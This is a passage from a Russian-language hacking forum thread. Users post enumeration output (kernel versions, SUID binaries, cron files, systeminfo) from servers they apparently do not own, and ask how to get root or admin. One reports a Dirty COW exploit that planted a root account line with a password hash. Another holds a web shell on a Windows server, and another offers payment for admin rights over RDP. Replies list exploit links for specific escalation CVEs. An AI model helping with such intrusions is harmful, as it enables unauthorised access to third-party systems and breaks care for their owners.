-rwxr-xr-x 1 root root 244624 2016-05-11 10:14:23.000000000 +0300 libnspr4.so
-rwxr-xr-x 1 root root 42808 2016-05-10 17:11:21.000000000 +0300 libnss_compat-2.12.so
lrwxrwxrwx 1 root root 21 2016-08-31 16:19:31.146973710 +0300 libnss_compat.so.2 -> libnss_compat-2.12.so
-rwxr-xr-x 1 root root 27424 2016-05-10 17:11:21.000000000 +0300 libnss_dns-2.12.so
lrwxrwxrwx 1 root root 18 2016-08-31 16:19:31.149973660 +0300 libnss_dns.so.2 -> libnss_dns-2.12.so
-rwxr-xr-x 1 root root 65960 2016-05-10 17:11:20.000000000 +0300 libnss_files-2.12.so
lrwxrwxrwx 1 root root 20 2016-08-31 16:19:31.152973609 +0300 libnss_files.so.2 -> libnss_files-2.12.so
-rwxr-xr-x 1 root root 24152 2016-05-10 17:11:19.000000000 +0300 libnss_hesiod-2.12.so
lrwxrwxrwx 1 root root 21 2016-08-31 16:19:31.154973575 +0300 libnss_hesiod.so.2 -> libnss_hesiod-2.12.so
-rwxr-xr-x 1 root root 52560 2016-05-10 17:11:20.000000000 +0300 libnss_nis-2.12.so
lrwxrwxrwx 1 root root 18 2016-08-31 16:19:31.157973526 +0300 libnss_nis.so.2 -> libnss_nis-2.12.so
-rwxr-xr-x 1 root root 61712 2016-05-10 17:11:19.000000000 +0300 libnss_nisplus-2.12.so
lrwxrwxrwx 1 root root 22 2016-08-31 16:19:31.160973475 +0300 libnss_nisplus.so.2 -> libnss_nisplus-2.12.so
lrwxrwxrwx 1 root root 16 2016-08-31 16:19:38.547849269 +0300 libpam.so.0 -> libpam.so.0.82.2
-rwxr-xr-x 1 root root 55848 2016-05-11 02:18:24.000000000 +0300 libpam.so.0.82.2
lrwxrwxrwx 1 root root 21 2016-08-31 16:19:38.550849219 +0300 libpam_misc.so.0 -> libpam_misc.so.0.82.0
-rwxr-xr-x 1 root root 14584 2016-05-11 02:18:24.000000000 +0300 libpam_misc.so.0.82.0
lrwxrwxrwx 1 root root 17 2016-08-31 16:19:38.551849202 +0300 libpamc.so.0 -> libpamc.so.0.82.1
-rwxr-xr-x 1 root root 14528 2016-05-11 02:18:24.000000000 +0300 libpamc.so.0.82.1
lrwxrwxrwx 1 root root 16 2014-12-01 11:49:42.902000000 +0300 libpci.so.3 -> libpci.so.3.1.10
-rwxr-xr-x 1 root root 48992 2014-08-05 15:06:35.000000000 +0400 libpci.so.3.1.10
lrwxrwxrwx 1 root root 16 2015-09-24 13:39:21.021000000 +0300 libpcre.so.0 -> libpcre.so.0.0.1
-rwxr-xr-x 1 root root 183080 2015-07-24 01:46:06.000000000 +0300 libpcre.so.0.0.1
-rwxr-xr-x 1 root root 18720 2016-05-11 10:14:23.000000000 +0300 libplc4.so
-rwxr-xr-x 1 root root 14560 2016-05-11 10:14:23.000000000 +0300 libplds4.so
lrwxrwxrwx 1 root root 27 2014-12-01 11:49:46.318000000 +0300 libply-splash-core.so.2 -> libply-splash-core.so.2.0.0
-rwxr-xr-x 1 root root 70360 2014-08-11 21:59:59.000000000 +0400 libply-splash-core.so.2.0.0
lrwxrwxrwx 1 root root 15 2014-12-01 11:49:46.324000000 +0300 libply.so.2 -> libply.so.2.0.0
-rwxr-xr-x 1 root root 89776 2014-08-11 21:59:59.000000000 +0400 libply.so.2.0.0
lrwxrwxrwx. 1 root root 16 2012-09-28 12:27:28.000000000 +0400 libpopt.so.0 -> libpopt.so.0.0.0
-rwxr-xr-x. 1 root root 36360 2010-08-21 09:30:58.000000000 +0400 libpopt.so.0.0.0
-rwxr-xr-x 1 root root 63200 2016-05-11 02:23:09.000000000 +0300 libproc-3.2.8.so
-rwxr-xr-x 1 root root 142688 2016-05-10 17:11:21.000000000 +0300 libpthread-2.12.so
lrwxrwxrwx 1 root root 18 2016-08-31 16:19:31.168973340 +0300 libpthread.so.0 -> libpthread-2.12.so
lrwxrwxrwx. 1 root root 18 2012-09-28 12:27:30.000000000 +0400 libreadline.so.6 -> libreadline.so.6.0
-rwxr-xr-x. 1 root root 269592 2012-06-22 10:54:32.000000000 +0400 libreadline.so.6.0
-rwxr-xr-x 1 root root 110960 2016-05-10 17:11:20.000000000 +0300 libresolv-2.12.so
lrwxrwxrwx 1 root root 17 2016-08-31 16:19:31.174973240 +0300 libresolv.so.2 -> libresolv-2.12.so
-rwxr-xr-x 1 root root 43944 2016-05-10 17:11:20.000000000 +0300 librt-2.12.so
lrwxrwxrwx 1 root root 13 2016-08-31 16:19:31.177973189 +0300 librt.so.1 -> librt-2.12.so
-rwxr-xr-x 1 root root 122056 2016-05-11 01:59:51.000000000 +0300 libselinux.so.1
-rwxr-xr-x 1 root root 201952 2015-07-24 04:38:39.000000000 +0300 libsemanage.so.1
-rwxr-xr-x. 1 root root 248680 2011-12-07 22:01:08.000000000 +0400 libsepol.so.1
lrwxrwxrwx 1 root root 12 2015-09-24 13:40:25.790000000 +0300 libss.so.2 -> libss.so.2.0
-rwxr-xr-x 1 root root 27120 2015-07-24 13:33:24.000000000 +0300 libss.so.2.0
-rwxr-xr-x 1 root root 34008 2016-05-10 17:11:21.000000000 +0300 libthread_db-1.0.so
lrwxrwxrwx 1 root root 19 2016-08-31 16:19:31.179973155 +0300 libthread_db.so.1 -> libthread_db-1.0.so
lrwxrwxrwx 1 root root 15 2015-09-24 13:39:11.316000000 +0300 libtinfo.so.5 -> libtinfo.so.5.7
-rwxr-xr-x 1 root root 132408 2015-03-16 11:54:00.000000000 +0300 libtinfo.so.5.7
lrwxrwxrwx 1 root root 16 2016-09-14 15:20:18.893921298 +0300 libudev.so.0 -> libudev.so.0.5.1
-rwxr-xr-x 1 root root 55184 2016-09-06 17:51:59.000000000 +0300 libudev.so.0.5.1
-rwxr-xr-x 1 root root 14584 2016-05-10 17:11:19.000000000 +0300 libutil-2.12.so
lrwxrwxrwx 1 root root 15 2016-08-31 16:19:31.181973122 +0300 libutil.so.1 -> libutil-2.12.so
lrwxrwxrwx 1 root root 16 2017-01-20 13:26:13.933986532 +0300 libuuid.so.1 -> libuuid.so.1.3.0
-rwxr-xr-x 1 root root 16304 2016-11-18 18:38:31.000000000 +0300 libuuid.so.1.3.0
lrwxrwxrwx 1 root root 16 2016-08-31 16:19:36.694880424 +0300 libwrap.so.0 -> libwrap.so.0.7.6
-rwxr-xr-x 1 root root 40792 2016-05-11 02:02:55.000000000 +0300 libwrap.so.0.7.6
lrwxrwxrwx 1 root root 36 2015-09-24 13:44:32.109000000 +0300 libxtables.so.4 -> /etc/alternatives/libxtables4.x86_64
lrwxrwxrwx 1 root root 25 2015-09-24 13:40:38.572000000 +0300 libxtables.so.4-1.4.7 -> libxtables.so.4.0.0-1.4.7
lrwxrwxrwx 1 root root 38 2015-09-24 13:44:32.109000000 +0300 libxtables.so.4.0.0 -> /etc/alternatives/libxtables400.x86_64
-rwxr-xr-x 1 root root 32208 2015-07-24 05:10:22.000000000 +0300 libxtables.so.4.0.0-1.4.7
lrwxrwxrwx 1 root root 13 2014-04-09 11:15:32.000000000 +0400 libz.so.1 -> libz.so.1.2.3
-rwxr-xr-x 1 root root 88600 2013-02-22 03:02:16.000000000 +0400 libz.so.1.2.3
drwxr-xr-x. 2 root root 4096 2015-06-09 15:16:03.062000000 +0300 rsyslog
drwxr-xr-x. 2 root root 4096 2016-08-31 16:19:31.184973071 +0300 rtkaio
drwxr-xr-x. 3 root root 4096 2016-08-31 16:19:39.936825917 +0300 security
dr-xr-xr-x. 2 root root 4096 2011-09-23 15:50:20.000000000 +0400 tls
drwxr-xr-x. 2 root root 4096 2015-09-24 13:41:59.052000000 +0300 xtables

mount

Code:
/dev/vda1 on / type ext4 (rw,noatime,usrquota,grpquota)
proc on /proc type proc (rw)
sysfs on /sys type sysfs (rw)
devpts on /dev/pts type devpts (rw,gid=5,mode=620)
tmpfs on /dev/shm type tmpfs (rw)
none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw)

df -h

Code:
Filesystem Size Used Avail Use% Mounted on
/dev/vda1 40G 16G 22G 43% /
tmpfs 2.0G 0 2.0G 0% /dev/shm

cat /etc/issue

Code:
CentOS release 6.8 (Final)
Kernel \r on an \m

cat /etc/crontab (ls -la cron.d, cron.hourly, cron.monthly, cron.weekly) + вывод содержимого каждого файла из этих директорий.

Code:
cat /etc/crontab 2>&1
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
HOME=/

# For details see man 4 crontabs

# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed

cron.d:
total 24
drwxr-xr-x 2 root root 4096 Jan 14 23:47 .
drwxr-xr-x. 90 root root 4096 Apr 25 12:15 ..
-rw-r--r-- 1 root root 113 Aug 23 2016 0hourly
-rw------- 1 root root 235 May 11 2016 sysstat
-rw-r--r-- 1 root root 51 Jan 14 23:47 trim
-rw-r--r-- 1 root root 187 Feb 9 2015 unbound-anchor

cat 0hourly sysstat trim unbound-anchor

SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
HOME=/
01 * * * * root run-parts /etc/cron.hourly
cat: sysstat: Permission denied
12 0 * * * root /usr/sbin/fstrim / > /dev/null 2>&1# Look to see if the DNSSEC Root key got rolled, if so check trust and update

10 3 1 * * unbound /usr/sbin/unbound-anchor -a /var/lib/unbound/root.anchor -c /etc/unbound/icannbundle.pem

cron.hourly:
total 12
drwxr-xr-x 2 root root 4096 Aug 31 2016 .
drwxr-xr-x. 90 root root 4096 Apr 25 12:15 ..
-rwxr-xr-x 1 root root 409 Aug 23 2016 0anacron

cat 0anacron
#!/bin/bash
# Skip excecution unless the date has changed from the previous run
if test -r /var/spool/anacron/cron.daily; then
day=`cat /var/spool/anacron/cron.daily`
fi
if [ `date +%Y%m%d` = "$day" ]; then
exit 0;
fi

# Skip excecution unless AC powered
if test -x /usr/bin/on_ac_power; then
/usr/bin/on_ac_power &> /dev/null
if test $? -eq 1; then
exit 0
fi
fi
/usr/sbin/anacron -s

cat /proc/version

Code:
Linux version 3.10.63-1.el6.elrepo.x86_64 (mockbuild@Build64R6) (gcc version 4.4.7 20120313 (Red Hat 4.4.7-11) (GCC) ) #1 SMP Tue Dec 16 16:52:21 EST 2014

cat /proc/sys/vm/mmap_min_addr

Code:
4096

find / -type f -perm -u+s -exec ls -la {} \; 2>/dev/null

Code:
-rwsr-xr-x 1 root root 38264 May 10 2016 /bin/ping
-rwsr-xr-x 1 root root 53472 Nov 18 2016 /bin/umount
-rwsr-xr-x 1 root root 77336 Nov 18 2016 /bin/mount
-rwsr-xr-x 1 root root 36488 May 10 2016 /bin/ping6
-rwsr-xr-x 1 root root 34904 May 11 2016 /bin/su
-rwsr-x--- 1 root dbus 46232 Apr 22 2015 /lib64/dbus-1/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 22544 Mar 17 2015 /usr/bin/pkexec
-rws--x--x 1 root root 20056 Nov 18 2016 /usr/bin/chsh
---s--x--x 1 root root 123832 Dec 7 2016 /usr/bin/sudo
-rwsr-xr-x 1 root root 70480 May 11 2016 /usr/bin/chage
-rws--x--x 1 root root 20184 Nov 18 2016 /usr/bin/chfn
-rwsr-xr-x 1 root root 51784 Aug 23 2016 /usr/bin/crontab
-rwsr-xr-x 1 root root 30768 Nov 23 2015 /usr/bin/passwd
-rwsr-xr-x 1 root root 75640 May 11 2016 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 40240 May 11 2016 /usr/bin/newgrp
-rws--x--x 1 root root 14280 May 10 2016 /usr/libexec/pt_chown
-rws--x--x 1 vcsa root 7352 May 11 2016 /usr/libexec/mc/cons.saver
-rwsr-xr-x 1 root root 14368 Mar 17 2015 /usr/libexec/polkit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 257824 May 12 2016 /usr/libexec/openssh/ssh-keysign
-rwsr-xr-x 1 root root 9000 Jul 12 2016 /usr/sbin/usernetctl
-r-s--x--- 1 root apache 13984 Jan 12 20:10 /usr/sbin/suexec
-rwsr-xr-x 1 root root 1228104 Jun 9 2016 /usr/sbin/exim
-rwsr-xr-x 1 root root 34840 May 11 2016 /sbin/unix_chkpwd
-rwsr-xr-x 1 root root 10272 May 11 2016 /sbin/pam_timestamp_check

Остольное Permission denied

ACat

04.07.2017, 20:21

https://www.exploit-db.com/exploits/42275/

если получится скомпилировать - отмаячь

Traffim

05.07.2017, 01:16

Помогите (за вознаграждение) получить по RDP права администратора (или повысить привилегии). Имеется доступ к учетной записи гостя.

https://i.snag.gy/g8OybK.jpg

https://i.snag.gy/H8mCXA.jpg

https://i.snag.gy/g8OybK.jpg

https://i.snag.gy/H8mCXA.jpg

alexan-net

06.07.2017, 00:59

Привет..

Может кто поможет советом

Windows7 рабочий. Доменный. Права так понимаю с AD..

Компьютер блокируется через 20 минут бездействия (даже если в электропитании выключен сон и отключение монитора)

В меню "Запрос пароля при пробуждении" выбрать "Не запрашивать пароль" не представляется возможным, т.к. имеются ограничения прав на данную настройку.

Как бы так полулегально сделать, в тайне от администратора, чтобы комп работал и не приходилось каждый раз вводить пароль.

Как сделать, чтобы комп не блокировался?

ACat

09.07.2017, 21:18

Пацаны, помогите с Gentoo linux

uname -a

Linux ul9 2.6.35.7-c-s-m-1gb-ua #6 SMP Thu Jul 2 17:46:10 EEST 2015 x86_64 Intel(R) Xeon(R) CPU X5650 @ 2.67GHz GenuineIntel GNU/Linux

сработал dirty cow но почему-то не могу подключится со своим паролем через ssh

а так же там отсутствует su

что делать?

./dc qwertyuio123

sh: [22961: 3 (259)] tcsetattr: Invalid argument

при этом

firefart:fizS6CvT/B75g:0:0wned:/root:/bin/bash

однако через ssh не подключается

kacergei

27.07.2017, 14:06

Имеется web shell на Windows платформе

.SpoilerTarget" type="button">Spoiler: Win
Windows NT 6.3 build 9600 (Windows Server 2012 R2 Standard Edition) i586

Microsoft Windows [Version 6.3.9600]

PHP/5.6.31

Microsoft-IIS/8.5

cURLMySQL/mysqlnd 5.0.11-dev

----

Host Name: SERVER1

OS Name: Microsoft Windows Server 2012 R2 Standard

OS Version: 6.3.9600 N/A Build 9600

OS Manufacturer: Microsoft Corporation

OS Configuration: Standalone Server

OS Build Type: Multiprocessor Free

Registered Owner: Windows User

Registered Organization:

Original Install Date: 7/24/2015, 6:06:36 PM

System Boot Time: 7/24/2017, 8:50:48 PM

System Manufacturer: Supermicro

System Model: SYS-6018R-MT

System Type: x64-based PC

Processor(s): 2 Processor(s) Installed.

[01]: Intel64 Family 6 Model 63 Stepping 2 GenuineIntel ~1200 Mhz

[02]: Intel64 Family 6 Model 63 Stepping 2 GenuineIntel ~1200 Mhz

BIOS Version: American Megatrends Inc. 2.0, 12/18/2015

Windows Directory: C:\Windows

System Directory: C:\Windows\system32

Boot Device: \Device\HarddiskVolume2

System Locale: en-us;English (United States)

Input Locale: en-us;English (United States)

Time Zone: (UTC-05:00) Eastern Time (US & Canada)

Total Physical Memory: 65,426 MB

Available Physical Memory: 19,966 MB

Virtual Memory: Max Size: 130,962 MB

Virtual Memory: Available: 79,531 MB

Virtual Memory: In Use: 51,431 MB

Page File Location(s): C:\pagefile.sys

Domain: WORKGROUP

Logon Server: N/A

Hotfix(s): N/A

Network Card(s): 2 NIC(s) Installed.

[01]: Intel(R) I210 Gigabit Network Connection

Connection Name: Ethernet 8

DHCP Enabled: No

IP address(es)

[01]: ---IP---

[02]: ---MAC---

[02]: Intel(R) I210 Gigabit Network Connection

Connection Name: Internet

DHCP Enabled: No

IP address(es)

[01]: ---IP---
Как поднять права на данной машине?

PS Посоветуйте web shell для windows

SooLFaa

27.07.2017, 17:09

[QUOTE="kacergei"]
kacergei said:
↑ (https://antichat.live/posts/4110466/)
Имеется web shell на Windows платформе
Spoiler: Win
Windows NT 6.3 build 9600 (Windows Server 2012 R2 Standard Edition) i586
Microsoft Windows [Version 6.3.9600]
PHP
/5.6.31
Microsoft-IIS
/8.5
cURLMySQL
/mysqlnd 5.0.11-dev
----
Host Name: SERVER1
OS Name: Microsoft Windows Server 2012 R2 Standard
OS Version: 6.3.9600 N/A Build 9600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Original Install Date: 7/24/2015, 6:06:36 PM
System Boot Time: 7/24/2017, 8:50:48 PM
System Manufacturer: Supermicro
System Model: SYS-6018R-MT
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: Intel64 Family 6 Model 63 Stepping 2 GenuineIntel ~1200 Mhz
[02]: Intel64 Family 6 Model 63 Stepping 2 GenuineIntel ~1200 Mhz
BIOS Version: American Megatrends Inc. 2.0, 12/18/2015
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume2
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC-05:00) Eastern Time (US & Canada)
Total Physical Memory: 65,426 MB
Available Physical Memory: 19,966 MB
Virtual Memory: Max Size: 130,962 MB
Virtual Memory: Available: 79,531 MB
Virtual Memory: In Use: 51,431 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 2 NIC(s) Installed.
[01]: Intel(R) I210 Gigabit Network Connection
Connection Name: Ethernet 8
DHCP Enabled: No
IP address(es)
[01]: ---IP---
[02]: ---MAC---
[02]: Intel(R) I210 Gigabit Network Connection
Connection Name: Internet
DHCP Enabled: No
IP address(es)
[01]: ---IP--- C:\temp\1.txt" полученный файл мне в лс.

2) passthru вместо system, ибо system по дефолту cmd не понимает.

SooLFaa

27.07.2017, 17:15

ACat said:
↑ (https://antichat.live/posts/4104153/)
Пацаны, помогите с Gentoo linux
uname -a
Linux ul9 2.6.35.7-c-s-m-1gb-ua #6 SMP Thu Jul 2 17:46:10 EEST 2015 x86_64 Intel(R) Xeon(R) CPU X5650 @ 2.67GHz GenuineIntel GNU/Linux
сработал dirty cow но почему-то не могу подключится со своим паролем через ssh
а так же там отсутствует su
что делать?
./dc qwertyuio123
sh: [22961: 3 (259)] tcsetattr: Invalid argument
при этом
firefart:fizS6CvT/B75g:0:0
wned:/root:/bin/bash
однако через ssh не подключается

1) Дай вывод sudo -l

2) Вывод /etc/cron или файлы в cron.d

3) что находится в tmp, opt

4) Попробуй sudo -i (а вдруг ты уже в sudoers )

5) Попробуй создать symlink

6) Попробуй скриптик http://www.securitysift.com/download/linuxprivchecker.py

SooLFaa

27.07.2017, 18:27

UPDATE: Sysinfo кинул. Лови список

.SpoilerTarget" type="button">Spoiler: Список

Code:
[M] MS16-075: Security Update for Windows SMB Server (3164038) - Important
https://github.com/foxglovesec/RottenPotato
https://github.com/Kevin-Robertson/Tater
https://bugs.chromium.org/p/project-zero/issues/detail?id=222 -- Windows: Local WebDAV NTLM Reflection Elevation of Privilege
https://foxglovesecurity.com/2016/01/16/hot-potato/ -- Hot Potato - Windows Privilege Escalation

[E] MS16-032: Security Update for Secondary Logon to Address Elevation of Privile (3143141) - Important
https://www.exploit-db.com/exploits/40107/ -- MS16-032 Secondary Logon Handle Privilege Escalation, MSF
https://www.exploit-db.com/exploits/39574/ -- Microsoft Windows 8.1/10 - Secondary Logon Standard Handles Missing Sanitization Privilege Escalation (MS16-032), PoC
https://www.exploit-db.com/exploits/39719/ -- Microsoft Windows 7-10 & Server 2008-2012 (x32/x64) - Local Privilege Escalation (MS16-032) (PowerShell), PoC
https://www.exploit-db.com/exploits/39809/ -- Microsoft Windows 7-10 & Server 2008-2012 (x32/x64) - Local Privilege Escalation (MS16-032) (C#)

[M] MS16-016: Security Update for WebDAV to Address Elevation of Privilege (3136041) - Important
https://www.exploit-db.com/exploits/40085/ -- MS16-016 mrxdav.sys WebDav Local Privilege Escalation, MSF
https://www.exploit-db.com/exploits/39788/ -- Microsoft Windows 7 - WebDAV Privilege Escalation Exploit (MS16-016) (2), PoC
https://www.exploit-db.com/exploits/39432/ -- Microsoft Windows 7 SP1 x86 - WebDAV Privilege Escalation (MS16-016) (1), PoC

[E] MS15-102: Vulnerabilities in Windows Task Management Could Allow Elevation of Privilege (3089657) - Important
https://www.exploit-db.com/exploits/38202/ -- Windows CreateObjectTask SettingsSyncDiagnostics Privilege Escalation, PoC
https://www.exploit-db.com/exploits/38200/ -- Windows Task Scheduler DeleteExpiredTaskAfter File Deletion Privilege Escalation, PoC
https://www.exploit-db.com/exploits/38201/ -- Windows CreateObjectTask TileUserBroker Privilege Escalation, PoC

[M] MS15-051: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (3057191) - Important
https://github.com/hfiref0x/CVE-2015-1701, Win32k Elevation of Privilege Vulnerability, PoC
https://www.exploit-db.com/exploits/37367/ -- Windows ClientCopyImage Win32k Exploit, MSF

[E] MS14-040: Vulnerability in Ancillary Function Driver (AFD) Could Allow Elevation of Privilege (2975684) - Important
https://www.exploit-db.com/exploits/39525/ -- Microsoft Windows 7 x64 - afd.sys Privilege Escalation (MS14-040), PoC
https://www.exploit-db.com/exploits/39446/ -- Microsoft Windows - afd.sys Dangling Pointer Privilege Escalation (MS14-040), PoC

[E] MS14-026: Vulnerability in .NET Framework Could Allow Elevation of Privilege (2958732) - Important
http://www.exploit-db.com/exploits/35280/, -- .NET Remoting Services Remote Command Execution, PoC

spize0r

01.08.2017, 01:41

Подскажите как повысить привилегии. Каким эксплойтом?

есть два сервера

1:

$ uname -a

Linux ks209234.kimsufi.com 2.6.38.2-xxxx-std-ipv6-64 #2 SMP Thu Aug 25 16:43:23 UTC 2011 x86_64 x86_64 x86_64 GNU/Linux

$ cat /etc/*-release

CentOS release 6.2 (Final)

CentOS release 6.2 (Final)

CentOS release 6.2 (Final)

2:

$ uname -a

Linux php54-web-21 4.4.0-53-generic #74-Ubuntu SMP Fri Dec 2 15:59:10 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux

$ cat /etc/*-release

DISTRIB_ID=Ubuntu

DISTRIB_RELEASE=16.04

DISTRIB_CODENAME=xenial

DISTRIB_DESCRIPTION="Ubuntu 16.04.2 LTS"

NAME="Ubuntu"

VERSION="16.04.2 LTS (Xenial Xerus)"

ID=ubuntu

ID_LIKE=debian

PRETTY_NAME="Ubuntu 16.04.2 LTS"

VERSION_ID="16.04"

HOME_URL="http://www.ubuntu.com/"

SUPPORT_URL="http://help.ubuntu.com/"

BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"

VERSION_CODENAME=xenial

UBUNTU_CODENAME=xenial

Спасибо

SooLFaa

02.08.2017, 18:18

spize0r said:
↑ (https://antichat.live/posts/4112059/)
Подскажите как повысить привилегии. Каким эксплойтом?
есть два сервера
1:
$ uname -a
Linux ks209234.kimsufi.com 2.6.38.2-xxxx-std-ipv6-64 #2 SMP Thu Aug 25 16:43:23 UTC 2011 x86_64 x86_64 x86_64 GNU/Linux
$ cat /etc/*-release
CentOS release 6.2 (Final)
CentOS release 6.2 (Final)
CentOS release 6.2 (Final)
2:
$ uname -a
Linux php54-web-21 4.4.0-53-generic #74-Ubuntu SMP Fri Dec 2 15:59:10 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
$ cat /etc/*-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.04
DISTRIB_CODENAME=xenial
DISTRIB_DESCRIPTION="Ubuntu 16.04.2 LTS"
NAME="Ubuntu"
VERSION="16.04.2 LTS (Xenial Xerus)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 16.04.2 LTS"
VERSION_ID="16.04"
HOME_URL="
http://www.ubuntu.com/
"
SUPPORT_URL="
http://help.ubuntu.com/
"
BUG_REPORT_URL="
http://bugs.launchpad.net/ubuntu/
"
VERSION_CODENAME=xenial
UBUNTU_CODENAME=xenial
Спасибо

http://www.securitysift.com/download/linuxprivchecker.py - вывод скрипта мне в лс

DezMond™

04.08.2017, 11:05

Хелп

* uname -a

Code:
Linux ip-10-149-5-107 2.6.32-431.1.2.0.1.el6.x86_64 #1 SMP Fri Dec 13 13:06:13 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux

* ls -la /boot

Code:
total 39464
dr-xr-xr-x. 4 root root 4096 Dec 23 2013 .
drwxr-xr-x. 24 root root 4096 Jun 20 06:40 ..
-rw-r--r--. 1 root root 171 Oct 16 2012 .vmlinuz-2.6.32-279.11.1.el6.x86_64.hmac
-rw-r--r--. 1 root root 170 Mar 12 2013 .vmlinuz-2.6.32-358.2.1.el6.x86_64.hmac
-rw-r--r--. 1 root root 174 Dec 13 2013 .vmlinuz-2.6.32-431.1.2.0.1.el6.x86_64.hmac
-rw-r--r--. 1 root root 2342243 Oct 16 2012 System.map-2.6.32-279.11.1.el6.x86_64
-rw-r--r--. 1 root root 2407544 Mar 12 2013 System.map-2.6.32-358.2.1.el6.x86_64
-rw-r--r--. 1 root root 2518212 Dec 13 2013 System.map-2.6.32-431.1.2.0.1.el6.x86_64
-rw-r--r--. 1 root root 101977 Oct 16 2012 config-2.6.32-279.11.1.el6.x86_64
-rw-r--r--. 1 root root 104085 Mar 12 2013 config-2.6.32-358.2.1.el6.x86_64
-rw-r--r--. 1 root root 105203 Dec 13 2013 config-2.6.32-431.1.2.0.1.el6.x86_64
drwxr-xr-x. 3 root root 4096 Oct 30 2012 efi
drwxr-xr-x. 2 root root 4096 Dec 23 2013 grub
-rw-r--r--. 1 root root 6512664 Oct 30 2012 initramfs-2.6.32-279.11.1.el6.x86_64.img
-rw-r--r--. 1 root root 6619790 Apr 22 2013 initramfs-2.6.32-358.2.1.el6.x86_64.img
-rw-------. 1 root root 6921745 Dec 23 2013 initramfs-2.6.32-431.1.2.0.1.el6.x86_64.img
-rw-r--r--. 1 root root 179202 Oct 16 2012 symvers-2.6.32-279.11.1.el6.x86_64.gz
-rw-r--r--. 1 root root 185828 Mar 12 2013 symvers-2.6.32-358.2.1.el6.x86_64.gz
-rw-r--r--. 1 root root 193760 Dec 13 2013 symvers-2.6.32-431.1.2.0.1.el6.x86_64.gz
-rwxr-xr-x. 1 root root 3987760 Oct 16 2012 vmlinuz-2.6.32-279.11.1.el6.x86_64
-rwxr-xr-x. 1 root root 4043920 Mar 12 2013 vmlinuz-2.6.32-358.2.1.el6.x86_64
-rwxr-xr-x. 1 root root 4128784 Dec 13 2013 vmlinuz-2.6.32-431.1.2.0.1.el6.x86_64

* ls -la --full-time /lib

Code:
dr-xr-xr-x. 9 root root 4096 2013-12-15 12:30:03.701829792 -0800 .
drwxr-xr-x. 24 root root 4096 2017-06-20 06:40:08.269205113 -0700 ..
lrwxrwxrwx. 1 root root 14 2013-12-15 12:30:03.698829792 -0800 cpp -> ../usr/bin/cpp
drwxr-xr-x. 42 root root 4096 2013-11-22 11:09:17.000000000 -0800 firmware
drwxr-xr-x. 6 root root 4096 2012-10-30 18:33:20.000000000 -0700 kbd
drwxr-xr-x. 2 root root 4096 2013-05-09 17:49:28.605425768 -0700 lsb
dr-xr-xr-x. 5 root root 4096 2013-12-23 02:31:35.810829793 -0800 modules
drwxr-xr-x. 2 root root 4096 2013-12-15 12:32:06.450829793 -0800 security
drwxr-xr-x. 6 root root 4096 2012-10-30 18:33:20.000000000 -0700 terminfo
drwxr-xr-x. 5 root root 4096 2013-12-23 02:31:18.871829793 -0800 udev

* cat /etc/*-release

Code:
CentOS release 6.5 (Final)
LSB_VERSION=base-4.0-amd64:base-4.0-noarch:core-4.0-amd64:core-4.0-noarch:graphics-4.0-amd64:graphics-4.0-noarch:printing-4.0-amd64:printing-4.0-noarch
CentOS release 6.5 (Final)
CentOS release 6.5 (Final)

zifus

09.08.2017, 11:04

DezMond™ said:
↑ (https://antichat.live/posts/4113400/)
Хелп
* uname -a

Code:
Linux ip-10-149-5-107 2.6.32-431.1.2.0.1.el6.x86_64 #1 SMP Fri Dec 13 13:06:13 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux

* ls -la /boot

Code:
total 39464
dr-xr-xr-x. 4 root root 4096 Dec 23 2013 .
drwxr-xr-x. 24 root root 4096 Jun 20 06:40 ..
-rw-r--r--. 1 root root 171 Oct 16 2012 .vmlinuz-2.6.32-279.11.1.el6.x86_64.hmac
-rw-r--r--. 1 root root 170 Mar 12 2013 .vmlinuz-2.6.32-358.2.1.el6.x86_64.hmac
-rw-r--r--. 1 root root 174 Dec 13 2013 .vmlinuz-2.6.32-431.1.2.0.1.el6.x86_64.hmac
-rw-r--r--. 1 root root 2342243 Oct 16 2012 System.map-2.6.32-279.11.1.el6.x86_64
-rw-r--r--. 1 root root 2407544 Mar 12 2013 System.map-2.6.32-358.2.1.el6.x86_64
-rw-r--r--. 1 root root 2518212 Dec 13 2013 System.map-2.6.32-431.1.2.0.1.el6.x86_64
-rw-r--r--. 1 root root 101977 Oct 16 2012 config-2.6.32-279.11.1.el6.x86_64
-rw-r--r--. 1 root root 104085 Mar 12 2013 config-2.6.32-358.2.1.el6.x86_64
-rw-r--r--. 1 root root 105203 Dec 13 2013 config-2.6.32-431.1.2.0.1.el6.x86_64
drwxr-xr-x. 3 root root 4096 Oct 30 2012 efi
drwxr-xr-x. 2 root root 4096 Dec 23 2013 grub
-rw-r--r--. 1 root root 6512664 Oct 30 2012 initramfs-2.6.32-279.11.1.el6.x86_64.img
-rw-r--r--. 1 root root 6619790 Apr 22 2013 initramfs-2.6.32-358.2.1.el6.x86_64.img
-rw-------. 1 root root 6921745 Dec 23 2013 initramfs-2.6.32-431.1.2.0.1.el6.x86_64.img
